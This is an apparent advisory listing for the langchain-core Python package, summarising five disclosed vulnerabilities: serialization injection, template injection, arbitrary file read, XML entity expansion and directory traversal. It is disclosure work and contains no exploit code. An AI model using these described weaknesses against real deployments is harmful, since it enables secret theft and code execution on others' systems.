Advisories for Pypi/Langchain-Core package

2025

LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs

A serialization injection vulnerability exists in LangChain's dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.

LangChain Vulnerable to Template Injection via Attribute Access in Prompt Templates

Attackers who can control template strings (not just template variables) can: Access Python object attributes and internal properties via attribute traversal Extract sensitive information from object internals (e.g., class, globals) Potentially escalate to more severe attacks depending on the objects passed to templates Attackers who can control template strings (not just template variables) can: Access Python object attributes and internal properties via attribute traversal Extract sensitive information from object internals …

langchain-core allows unauthorized users to read arbitrary files from the host file system

A vulnerability in langchain-core versions >=0.1.17,<0.1.53, >=0.2.0,<0.2.43, and >=0.3.0,<0.3.15 allows unauthorized users to read arbitrary files from the host file system. The issue arises from the ability to create langchain_core.prompts.ImagePromptTemplate's (and by extension langchain_core.prompts.ChatPromptTemplate's) with input variables that can read any user-specified path from the server file system. If the outputs of these prompt templates are exposed to the user, either directly or through downstream model outputs, it can lead …

2024

LangChain's XMLOutputParser vulnerable to XML Entity Expansion

The XMLOutputParser in LangChain uses the etree module from the XML parser in the standard python library which has some XML vulnerabilities; see: https://docs.python.org/3/library/xml.html This primarily affects users that combine an LLM (or agent) with the XMLOutputParser and expose the component via an endpoint on a web-service. This would allow a malicious party to attempt to manipulate the LLM to produce a malicious payload for the parser that would compromise …

LangChain directory traversal vulnerability

LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution.